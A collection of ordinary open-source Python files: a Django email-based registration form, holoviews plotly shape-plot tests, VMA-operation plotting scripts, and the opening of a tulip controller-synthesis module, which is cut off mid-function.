from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from utils import email_to_username
class RegistrationForm(forms.Form):
"""
Our form for registering a new account.
This uses the user's email as their credentials.
"""
error_css_class = 'error'
required_css_class = 'required'
email = forms.EmailField()
password1 = forms.CharField(widget=forms.PasswordInput,
label=_("Password"))
password2 = forms.CharField(widget=forms.PasswordInput,
label=_("Repeat password"))
def clean_email(self):
"""
Validate that the supplied email address is unique for the
site.
"""
        if User.objects.filter(email__iexact=self.cleaned_data['email']).exists():
raise forms.ValidationError(_("This email address is already in use. Please use a different email address."))
return self.cleaned_data['email']
def clean(self):
"""
Verify that the values entered into the two password fields
match. Note that an error here will end up in
``non_field_errors()`` because it doesn't apply to a single
field.
"""
if 'password1' in self.cleaned_data and 'password2' in self.cleaned_data:
if self.cleaned_data['password1'] != self.cleaned_data['password2']:
raise forms.ValidationError(_("The two password fields didn't match."))
return self.cleaned_data
def create_user(self):
"""
Creates a new user from the existing form, generating a unique username
based on the user's email address.
"""
if self.errors:
raise forms.ValidationError("Unable to create user "
"because the data is invalid")
email = self.cleaned_data['email']
username = email_to_username(email)
password = self.cleaned_data['password1']
return User.objects.create_user(username, email, password)
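# Usage sketch (hypothetical view code):
#   form = RegistrationForm(data=request.POST)
#   if form.is_valid():
#       user = form.create_user()  # username derived from the email address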
| paulcwatts/django-auth-utils | auth_utils/forms.py | Python | bsd-3-clause | 2,089 |
from holoviews.element import (
VLine, HLine, Bounds, Box, Rectangles, Segments, Tiles, Path
)
import numpy as np
from .test_plot import TestPlotlyPlot
default_shape_color = '#2a3f5f'
class TestShape(TestPlotlyPlot):
def assert_shape_element_styling(self, element):
props = dict(
fillcolor='orange',
line_color='yellow',
line_dash='dot',
line_width=5,
opacity=0.7
)
element = element.clone().opts(**props)
state = self._get_plot_state(element)
shapes = state['layout']['shapes']
self.assert_property_values(shapes[0], props)
class TestMapboxShape(TestPlotlyPlot):
def setUp(self):
super().setUp()
# Precompute coordinates
self.xs = [3000000, 2000000, 1000000]
self.ys = [-3000000, -2000000, -1000000]
self.x_range = (-5000000, 4000000)
self.x_center = sum(self.x_range) / 2.0
self.y_range = (-3000000, 2000000)
self.y_center = sum(self.y_range) / 2.0
self.lon_range, self.lat_range = Tiles.easting_northing_to_lon_lat(self.x_range, self.y_range)
self.lon_centers, self.lat_centers = Tiles.easting_northing_to_lon_lat(
[self.x_center], [self.y_center]
)
self.lon_center, self.lat_center = self.lon_centers[0], self.lat_centers[0]
self.lons, self.lats = Tiles.easting_northing_to_lon_lat(self.xs, self.ys)
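# Note: Tiles.easting_northing_to_lon_lat converts Web Mercator metres into
# longitude/latitude degrees (the origin maps to 0 deg, 0 deg); the fixtures
# above precompute the corner and centre coordinates once so the Mapbox tests
# below can assert against them directly.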
class TestVLineHLine(TestShape):
def assert_vline(self, shape, x, xref='x', ydomain=(0, 1)):
self.assertEqual(shape['type'], 'line')
self.assertEqual(shape['x0'], x)
self.assertEqual(shape['x1'], x)
self.assertEqual(shape['xref'], xref)
self.assertEqual(shape['y0'], ydomain[0])
self.assertEqual(shape['y1'], ydomain[1])
self.assertEqual(shape['yref'], 'paper')
def assert_hline(self, shape, y, yref='y', xdomain=(0, 1)):
self.assertEqual(shape['type'], 'line')
self.assertEqual(shape['y0'], y)
self.assertEqual(shape['y1'], y)
self.assertEqual(shape['yref'], yref)
self.assertEqual(shape['x0'], xdomain[0])
self.assertEqual(shape['x1'], xdomain[1])
self.assertEqual(shape['xref'], 'paper')
def test_single_vline(self):
vline = VLine(3)
state = self._get_plot_state(vline)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_vline(shapes[0], 3)
def test_single_hline(self):
hline = HLine(3)
state = self._get_plot_state(hline)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_hline(shapes[0], 3)
def test_vline_layout(self):
layout = (VLine(1) + VLine(2) +
VLine(3) + VLine(4)).cols(2).opts(vspacing=0, hspacing=0)
state = self._get_plot_state(layout)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 4)
# Check shapes
self.assert_vline(shapes[0], 3, xref='x', ydomain=[0.0, 0.5])
self.assert_vline(shapes[1], 4, xref='x2', ydomain=[0.0, 0.5])
self.assert_vline(shapes[2], 1, xref='x3', ydomain=[0.5, 1.0])
self.assert_vline(shapes[3], 2, xref='x4', ydomain=[0.5, 1.0])
def test_hline_layout(self):
layout = (HLine(1) + HLine(2) +
HLine(3) + HLine(4)).cols(2).opts(vspacing=0, hspacing=0)
state = self._get_plot_state(layout)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 4)
# Check shapes
self.assert_hline(shapes[0], 3, yref='y', xdomain=[0.0, 0.5])
self.assert_hline(shapes[1], 4, yref='y2', xdomain=[0.5, 1.0])
self.assert_hline(shapes[2], 1, yref='y3', xdomain=[0.0, 0.5])
self.assert_hline(shapes[3], 2, yref='y4', xdomain=[0.5, 1.0])
def test_vline_styling(self):
self.assert_shape_element_styling(VLine(3))
def test_hline_styling(self):
self.assert_shape_element_styling(HLine(3))
class TestPathShape(TestShape):
def assert_path_shape_element(self, shape, element, xref='x', yref='y'):
# Check type
self.assertEqual(shape['type'], 'path')
# Check svg path
expected_path = 'M' + 'L'.join([
'{x} {y}'.format(x=x, y=y) for x, y in
zip(element.dimension_values(0), element.dimension_values(1))]) + 'Z'
self.assertEqual(shape['path'], expected_path)
# Check axis references
self.assertEqual(shape['xref'], xref)
self.assertEqual(shape['yref'], yref)
def test_simple_path(self):
path = Path([(0, 0), (1, 1), (0, 1), (0, 0)])
state = self._get_plot_state(path)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_path_shape_element(shapes[0], path)
self.assert_shape_element_styling(path)
class TestMapboxPathShape(TestMapboxShape):
def test_simple_path(self):
path = Tiles("") * Path([
(self.x_range[0], self.y_range[0]),
(self.x_range[1], self.y_range[1]),
(self.x_range[0], self.y_range[1]),
(self.x_range[0], self.y_range[0]),
]).redim.range(
x=self.x_range, y=self.y_range
)
state = self._get_plot_state(path)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["lon"], np.array([
self.lon_range[i] for i in (0, 1, 0, 0)
] + [np.nan]))
self.assertEqual(state["data"][1]["lat"], np.array([
self.lat_range[i] for i in (0, 1, 1, 0)
] + [np.nan]))
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
class TestBounds(TestPathShape):
def test_single_bounds(self):
bounds = Bounds((1, 2, 3, 4))
state = self._get_plot_state(bounds)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_path_shape_element(shapes[0], bounds)
def test_bounds_layout(self):
bounds1 = Bounds((0, 0, 1, 1))
bounds2 = Bounds((0, 0, 2, 2))
bounds3 = Bounds((0, 0, 3, 3))
bounds4 = Bounds((0, 0, 4, 4))
layout = (bounds1 + bounds2 +
bounds3 + bounds4).cols(2)
state = self._get_plot_state(layout)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 4)
# Check shapes
self.assert_path_shape_element(shapes[0], bounds3, xref='x', yref='y')
self.assert_path_shape_element(shapes[1], bounds4, xref='x2', yref='y2')
self.assert_path_shape_element(shapes[2], bounds1, xref='x3', yref='y3')
self.assert_path_shape_element(shapes[3], bounds2, xref='x4', yref='y4')
def test_bounds_styling(self):
self.assert_shape_element_styling(Bounds((1, 2, 3, 4)))
class TestMapboxBounds(TestMapboxShape):
def test_single_bounds(self):
bounds = Tiles("") * Bounds(
(self.x_range[0], self.y_range[0], self.x_range[1], self.y_range[1])
).redim.range(
x=self.x_range, y=self.y_range
)
state = self._get_plot_state(bounds)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["lon"], np.array([
self.lon_range[i] for i in (0, 0, 1, 1, 0)
]))
self.assertEqual(state["data"][1]["lat"], np.array([
self.lat_range[i] for i in (0, 1, 1, 0, 0)
]))
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
def test_bounds_layout(self):
bounds1 = Bounds((0, 0, 1, 1))
bounds2 = Bounds((0, 0, 2, 2))
bounds3 = Bounds((0, 0, 3, 3))
bounds4 = Bounds((0, 0, 4, 4))
layout = (Tiles("") * bounds1 + Tiles("") * bounds2 +
Tiles("") * bounds3 + Tiles("") * bounds4).cols(2)
state = self._get_plot_state(layout)
self.assertEqual(state['data'][1]["subplot"], "mapbox")
self.assertEqual(state['data'][3]["subplot"], "mapbox2")
self.assertEqual(state['data'][5]["subplot"], "mapbox3")
self.assertEqual(state['data'][7]["subplot"], "mapbox4")
self.assertNotIn("xaxis", state['layout'])
self.assertNotIn("yaxis", state['layout'])
class TestBox(TestPathShape):
def test_single_box(self):
box = Box(0, 0, (1, 2), orientation=1)
state = self._get_plot_state(box)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 1)
self.assert_path_shape_element(shapes[0], box)
def test_bounds_layout(self):
box1 = Box(0, 0, (1, 1), orientation=0)
box2 = Box(0, 0, (2, 2), orientation=0.5)
box3 = Box(0, 0, (3, 3), orientation=1.0)
box4 = Box(0, 0, (4, 4), orientation=1.5)
layout = (box1 + box2 +
box3 + box4).cols(2)
state = self._get_plot_state(layout)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 4)
# Check shapes
self.assert_path_shape_element(shapes[0], box3, xref='x', yref='y')
self.assert_path_shape_element(shapes[1], box4, xref='x2', yref='y2')
self.assert_path_shape_element(shapes[2], box1, xref='x3', yref='y3')
self.assert_path_shape_element(shapes[3], box2, xref='x4', yref='y4')
def test_box_styling(self):
self.assert_shape_element_styling(Box(0, 0, (1, 1)))
class TestMapboxBox(TestMapboxShape):
def test_single_box(self):
box = Tiles("") * Box(0, 0, (1000000, 2000000)).redim.range(
x=self.x_range, y=self.y_range
)
x_box_range = [-500000, 500000]
y_box_range = [-1000000, 1000000]
lon_box_range, lat_box_range = Tiles.easting_northing_to_lon_lat(x_box_range, y_box_range)
state = self._get_plot_state(box)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(state["data"][1]["lon"], np.array([
lon_box_range[i] for i in (0, 0, 1, 1, 0)
]))
self.assertEqual(state["data"][1]["lat"], np.array([
lat_box_range[i] for i in (0, 1, 1, 0, 0)
]))
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
class TestRectangles(TestPathShape):
def test_boxes_simple(self):
boxes = Rectangles([(0, 0, 1, 1), (2, 2, 4, 3)])
state = self._get_plot_state(boxes)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 2)
self.assertEqual(shapes[0], {'type': 'rect', 'x0': 0, 'y0': 0, 'x1': 1,
'y1': 1, 'xref': 'x', 'yref': 'y', 'name': '',
'line': {'color': default_shape_color}})
self.assertEqual(shapes[1], {'type': 'rect', 'x0': 2, 'y0': 2, 'x1': 4,
'y1': 3, 'xref': 'x', 'yref': 'y', 'name': '',
'line': {'color': default_shape_color}})
self.assertEqual(state['layout']['xaxis']['range'], [0, 4])
self.assertEqual(state['layout']['yaxis']['range'], [0, 3])
class TestMapboxRectangles(TestMapboxShape):
def test_rectangles_simple(self):
rectangles = Tiles("") * Rectangles([
(0, 0, self.x_range[1], self.y_range[1]),
(self.x_range[0], self.y_range[0], 0, 0),
]).redim.range(
x=self.x_range, y=self.y_range
)
state = self._get_plot_state(rectangles)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(state["data"][1]["lon"], np.array([
0, 0, self.lon_range[1], self.lon_range[1], 0, np.nan,
self.lon_range[0], self.lon_range[0], 0, 0, self.lon_range[0], np.nan
]))
self.assertEqual(state["data"][1]["lat"], np.array([
0, self.lat_range[1], self.lat_range[1], 0, 0, np.nan,
self.lat_range[0], 0, 0, self.lat_range[0], self.lat_range[0], np.nan
]))
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
class TestSegments(TestPathShape):
def test_segments_simple(self):
boxes = Segments([(0, 0, 1, 1), (2, 2, 4, 3)])
state = self._get_plot_state(boxes)
shapes = state['layout']['shapes']
self.assertEqual(len(shapes), 2)
self.assertEqual(shapes[0], {'type': 'line', 'x0': 0, 'y0': 0, 'x1': 1,
'y1': 1, 'xref': 'x', 'yref': 'y', 'name': '',
'line': {'color': default_shape_color}})
self.assertEqual(shapes[1], {'type': 'line', 'x0': 2, 'y0': 2, 'x1': 4,
'y1': 3, 'xref': 'x', 'yref': 'y', 'name': '',
'line': {'color': default_shape_color}})
self.assertEqual(state['layout']['xaxis']['range'], [0, 4])
self.assertEqual(state['layout']['yaxis']['range'], [0, 3])
class TestMapboxSegments(TestMapboxShape):
def test_segments_simple(self):
rectangles = Tiles("") * Segments([
(0, 0, self.x_range[1], self.y_range[1]),
(self.x_range[0], self.y_range[0], 0, 0),
]).redim.range(
x=self.x_range, y=self.y_range
)
state = self._get_plot_state(rectangles)
self.assertEqual(state["data"][1]["type"], "scattermapbox")
self.assertEqual(state["data"][1]["mode"], "lines")
self.assertEqual(state["data"][1]["showlegend"], False)
self.assertEqual(state["data"][1]["line"]["color"], default_shape_color)
self.assertEqual(state["data"][1]["lon"], np.array([
0, self.lon_range[1], np.nan,
self.lon_range[0], 0, np.nan
]))
self.assertEqual(state["data"][1]["lat"], np.array([
0, self.lat_range[1], np.nan,
self.lat_range[0], 0, np.nan
]))
self.assertEqual(
state['layout']['mapbox']['center'], {
'lat': self.lat_center, 'lon': self.lon_center
}
)
| ioam/holoviews | holoviews/tests/plotting/plotly/test_shapeplots.py | Python | bsd-3-clause | 15,348 |
# Virtual memory analysis scripts.
# Developed 2012-2014 by Peter Hornyack, [email protected]
# Copyright (c) 2012-2014 Peter Hornyack and University of Washington
from plotting.multiapp_plot_class import *
from util.pjh_utils import *
from plotting.plots_common import *
import trace.vm_common as vm
##############################################################################
# IMPORTANT: don't use any global / static variables here, otherwise
# they will be shared across plots! (and bad things like double-counting
# of vmas will happen). Constants are ok.
class vmaops_auxdata:
def __init__(self):
self.opcounts = dict()
self.veryfirstvma = True
return
def vmaops_resetfn(auxdata):
auxdata.opcounts.clear()
auxdata.veryfirstvma = True
return
def vmaops_all_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['alloc', 'free', 'resize', 'relocation', 'access_change',
'flag_change']
label_series_with_app = True
combine_ops = True
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_nonallocfree_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['resize', 'relocation', 'access_change', 'flag_change']
label_series_with_app = True
combine_ops = True
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_allocs_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['alloc']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_frees_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['free']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_resizes_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['resize']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_relocations_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['relocation']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_access_changes_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['access_change']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_flag_changes_datafn(auxdata, plot_event, tgid, currentapp):
desired_ops = ['flag_change']
label_series_with_app = True
combine_ops = False
return vmaops_datafn(auxdata, plot_event, tgid, currentapp,
desired_ops, label_series_with_app, combine_ops)
def vmaops_datafn(auxdata, plot_event, tgid, currentapp, desired_ops,
label_series_with_app=True, combine_ops=False):
tag = 'vmaops_datafn'
vma = plot_event.vma
if vma is None:
return None
# Skip this vma if it's for a shared lib, guard region, etc.
# Are there any other special considerations that we have to
# make for ignored vmas here (like in vmacount_datafn and
# vm_size_datafn)? These are the vma-op possibilities that
# are tracked below:
# alloc map
# resize remap
# relocation remap
# access_change remap
# flag_change remap
# free unmap
# If any of these operations act on a shared-lib / guard /
# shared-file vma, then they will be ignored here. One
# possible weirdness that I see is if a vma is first allocated
# as something that's ignored (e.g. r--pf for a shared lib) and
# then is access_changed to something that's not ignored, it
# will appear to be an access_change without a corresponding
# alloc, but I think this case occurs rarely if ever. The opposite
# occurs more frequently: something that was previously counted
# (e.g. rw-pf for a shared lib) is access_changed to something
# that's now ignored. In this case, the access_change will
# never be counted, and additionally there will be an alloc
# without a corresponding free.
# Ok, so this could be a little weird, and difficult to handle
# here because we don't do any tracking on unmaps at all.
# Just live with the weirdness I guess, or comment out the
# ignore_vma code here altogether for vmaops plots, depending
# on what we want to count exactly.
if vm.ignore_vma(vma):
debug_ignored(tag, ("ignoring vma {}").format(vma))
return None
# See extensive comments in consume_vma() about how each operation
# is encoded, especially frees!
# Look for explicit free operations first, then ignore any unmap
# operations that are part of unmap-remap pairs and count the
# remap operations.
if vma.is_unmapped and vma.unmap_op == 'free':
op = 'free'
timestamp = vma.unmap_timestamp
elif not vma.is_unmapped:
op = vma.vma_op
timestamp = vma.timestamp
elif auxdata.veryfirstvma:
# Create a point with the very first timestamp, so that every
# plot will start from the same time (rather than every plot
# starting from the first occurrence of a desired_op). This
# difference is meaningful for apps with very short execution
# times (e.g. it's misleading if the "frees" plot starts from
# the time of the very first free, which could only be at
# the very end of the execution).
# Only check this condition after checking the op conditions
# above, so that we don't skip the first op if it's meaningful
# for desired_ops.
# This works for the very first timestamp, but we should also
# do this for the very last timestamp too (which we don't
# know until plotting time... crap).
op = 'veryfirst'
timestamp = vma.timestamp
else:
print_debug(tag, ("vma_op={}, is_unmapped={}, unmap_op={}"
"this is an unmap for an unmap-remap "
"pair, so not counting this as an op.").format(vma.vma_op,
vma.is_unmapped, vma.unmap_op))
return None
print_debug(tag, ("op={}, timestamp={}").format(op, timestamp))
if op not in desired_ops and op != 'veryfirst':
# Don't care about this op type
return None
elif combine_ops:
# Combine all desired ops into one series
op_orig = op
op = 'combined'
try:
count = auxdata.opcounts[op]
except KeyError:
if op != 'veryfirst': # usual case
count = 0
else:
# This is the weird case: we want to create a 0 datapoint
# for the op that this plot is tracking. If this plot is
# tracking more than one op type, but is not combining
# them, then this gets a bit weird... but this doesn't
# actually happen right now.
count = -1
op = desired_ops[0]
if len(desired_ops) > 1:
print_warning(tag, ("very first op is not in desired_ops, "
"but desired_ops has len > 1, so creating a 0 datapoint "
"for just the first op {}").format(op))
count += 1
auxdata.opcounts[op] = count
auxdata.veryfirstvma = False
if count == 0:
print_debug(tag, ("creating a 0 datapoint for op {} "
"at timestamp {}").format(op, timestamp))
point = datapoint()
point.timestamp = timestamp
point.count = count
point.appname = currentapp
if label_series_with_app:
# No longer label seriesname with op - just with app name, and
# then use op in the title.
#seriesname = "{}-{}".format(currentapp, op)
seriesname = "{}".format(currentapp)
else:
seriesname = op
if combine_ops:
# don't allow, would put all ops for all apps into one series.
print_error(tag, ("invalid combination of label_series "
"and combine_ops"))
seriesname = op_orig
# Return a list of (seriesname, datapoint) tuples:
return [(seriesname, point)]
def vmaops_ts_plotfn(seriesdict, plotname, workingdir, title, ysplits=None):
tag = 'vmaops_ts_plotfn'
for appserieslist in seriesdict.values():
if False:
for S in appserieslist:
for dp in S.data:
print_debug(tag, ("debug: datapoint: count={}, "
"timestamp={}").format(dp.count, dp.timestamp))
normalize_appserieslist(appserieslist, True)
if False:
for S in appserieslist:
for dp in S.data:
print_debug(tag, ("debug: normalized: count={}, "
"timestamp={}").format(dp.count, dp.timestamp))
cp_series = handle_cp_series(seriesdict)
plotdict = construct_scale_ts_plotdict(seriesdict)
# Set up y-axis splits: set to None to just use one plot, or pass
# a list of maximum y-values and plot_time_series will split up
# the series into multiple plots, each plot with a different y-axis.
#ysplits = []
if ysplits is None:
ysplits = [100, 1000, 10000, 100000]
#title = ("VM operations over time").format()
xaxis = "Execution time"
yaxis = "Number of operations"
return plot_time_series(plotdict, title, xaxis, yaxis, ysplits,
logscale=False, cp_series=cp_series)
def vmaops_all_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"All VMA operations over time")
def vmaops_allocs_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA allocations over time")
def vmaops_frees_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA frees over time")
def vmaops_resizes_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA resizes over time", ysplits=[500, 5000])
def vmaops_relocs_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA relocations over time")
def vmaops_flag_changes_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA flag changes over time")
def vmaops_access_changes_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA permission changes over time")
def vmaops_nonallocfree_ts_plotfn(seriesdict, plotname, workingdir):
return vmaops_ts_plotfn(seriesdict, plotname, workingdir,
"VMA resizes, relocations, and permission changes")
##############################################################################
vmaops_all_plot = multiapp_plot('vma-ops-all',
vmaops_auxdata, vmaops_all_ts_plotfn,
vmaops_all_datafn, vmaops_resetfn)
vmaops_allocs_plot = multiapp_plot('vma-ops-allocs',
vmaops_auxdata, vmaops_allocs_ts_plotfn,
vmaops_allocs_datafn, vmaops_resetfn)
vmaops_frees_plot = multiapp_plot('vma-ops-frees', vmaops_auxdata,
vmaops_frees_ts_plotfn, vmaops_frees_datafn, vmaops_resetfn)
vmaops_resizes_plot = multiapp_plot('vma-ops-resizes',
vmaops_auxdata, vmaops_resizes_ts_plotfn,
vmaops_resizes_datafn, vmaops_resetfn)
vmaops_relocations_plot = multiapp_plot('vma-ops-relocations',
vmaops_auxdata, vmaops_relocs_ts_plotfn,
vmaops_relocations_datafn, vmaops_resetfn)
vmaops_access_changes_plot = multiapp_plot('vma-ops-access_changes',
vmaops_auxdata, vmaops_access_changes_ts_plotfn,
vmaops_access_changes_datafn, vmaops_resetfn)
vmaops_flag_changes_plot = multiapp_plot('vma-ops-flag_changes',
vmaops_auxdata, vmaops_flag_changes_ts_plotfn,
vmaops_flag_changes_datafn, vmaops_resetfn)
vmaops_nonallocfree_plot = multiapp_plot('vma-ops-nonallocfree',
vmaops_auxdata, vmaops_nonallocfree_ts_plotfn,
vmaops_nonallocfree_datafn, vmaops_resetfn)
if __name__ == '__main__':
print_error_exit("not an executable module")
| pjh/vm-analyze | plotting/plot_vmaops.py | Python | bsd-3-clause | 11,539 |
# Copyright (c) 2011-2014 by California Institute of Technology
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the California Institute of Technology nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH
# OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
# USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
# OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
"""
Algorithms related to controller synthesis for discretized dynamics.
Primary functions:
- L{get_input}
Helper functions:
- L{get_input_helper}
- L{is_seq_inside}
See Also
========
L{discretize}
"""
from __future__ import absolute_import
import logging
import numpy as np
from cvxopt import matrix, solvers
import polytope as pc
from .feasible import solve_feasible, createLM, _block_diag2
logger = logging.getLogger(__name__)
try:
import cvxopt.glpk
except ImportError:
    logger.warning(
'`tulip` failed to import `cvxopt.glpk`.\n'
'Will use Python solver of `cvxopt`.')
solvers.options['msg_lev'] = 'GLP_MSG_OFF'
def get_input(
x0, ssys, abstraction,
start, end,
R=[], r=[], Q=[], mid_weight=0.0,
test_result=False
):
"""Compute continuous control input for discrete transition.
Computes a continuous control input sequence
which takes the plant:
- from state C{start}
- to state C{end}
These are states of the partition C{abstraction}.
The computed control input is such that::
        f(x, u) = x'Rx + r'x + u'Qu + mid_weight * |xc - x(N)|_2
be minimal.
C{xc} is the chebyshev center of the final cell.
If no cost parameters are given, then the defaults are:
- Q = I
- mid_weight = 3
Notes
=====
1. The same horizon length as in reachability analysis
should be used in order to guarantee feasibility.
2. If the closed loop algorithm has been used
to compute reachability the input needs to be
recalculated for each time step
(with decreasing horizon length).
In this case only u(0) should be used as
a control signal and u(1) ... u(N-1) discarded.
3. The "conservative" calculation makes sure that
the plant remains inside the convex hull of the
starting region during execution, i.e.::
x(1), x(2) ... x(N-1) are
\in conv_hull(starting region).
If the original proposition preserving partition
is not convex, then safety cannot be guaranteed.
@param x0: initial continuous state
@type x0: numpy 1darray
@param ssys: system dynamics
@type ssys: L{LtiSysDyn}
@param abstraction: abstract system dynamics
@type abstraction: L{AbstractPwa}
@param start: index of the initial state in C{abstraction.ts}
@type start: int >= 0
@param end: index of the end state in C{abstraction.ts}
@type end: int >= 0
@param R: state cost matrix for::
x = [x(1)' x(2)' .. x(N)']'
If empty, zero matrix is used.
@type R: size (N*xdim x N*xdim)
@param r: cost vector for state trajectory:
x = [x(1)' x(2)' .. x(N)']'
@type r: size (N*xdim x 1)
@param Q: input cost matrix for control input::
u = [u(0)' u(1)' .. u(N-1)']'
If empty, identity matrix is used.
@type Q: size (N*udim x N*udim)
@param mid_weight: cost weight for |x(N)-xc|_2
@param test_result: performs a simulation
(without disturbance) to make sure that
the calculated input sequence is safe.
@type test_result: bool
@return: array A where row k contains the
control input: u(k)
for k = 0,1 ... N-1
@rtype: (N x m) numpy 2darray
"""
#@param N: horizon length
#@type N: int >= 1
#@param conservative:
# if True,
# then force plant to stay inside initial
# state during execution.
#
# Otherwise, plant is forced to stay inside
# the original proposition preserving cell.
#@type conservative: bool
#@param closed_loop: should be True
# if closed loop discretization has been used.
#@type closed_loop: bool
part = abstraction.ppp
regions = part.regions
ofts = abstraction.ts
original_regions = abstraction.orig_ppp
orig = abstraction._ppp2orig
params = abstraction.disc_params
N = params['N']
conservative = params['conservative']
closed_loop = params['closed_loop']
if (len(R) == 0) and (len(Q) == 0) and \
(len(r) == 0) and (mid_weight == 0):
# Default behavior
Q = np.eye(N*ssys.B.shape[1])
R = np.zeros([N*x0.size, N*x0.size])
r = np.zeros([N*x0.size,1])
mid_weight = 3
if len(R) == 0:
R = np.zeros([N*x0.size, N*x0.size])
if len(Q) == 0:
Q = np.eye(N*ssys.B.shape[1])
if len(r) == 0:
r = np.zeros([N*x0.size,1])
if (R.shape[0] != R.shape[1]) or (R.shape[0] != N*x0.size):
raise Exception("get_input: "
"R must be square and have side N * dim(state space)")
if (Q.shape[0] != Q.shape[1]) or (Q.shape[0] != N*ssys.B.shape[1]):
raise Exception("get_input: "
"Q must be square and have side N * dim(input space)")
if ofts is not None:
start_state = start
end_state = end
if end_state not in ofts.states.post(start_state):
raise Exception('get_input: '
'no transition from state s' +str(start) +
' to state s' +str(end)
)
else:
print("get_input: "
"Warning, no transition matrix found, assuming feasible")
if (not conservative) & (orig is None):
print("List of original proposition preserving "
"partitions not given, reverting to conservative mode")
conservative = True
P_start = regions[start]
P_end = regions[end]
n = ssys.A.shape[1]
m = ssys.B.shape[1]
idx = range((N-1)*n, N*n)
if conservative:
# Take convex hull or P_start as constraint
if len(P_start) > 0:
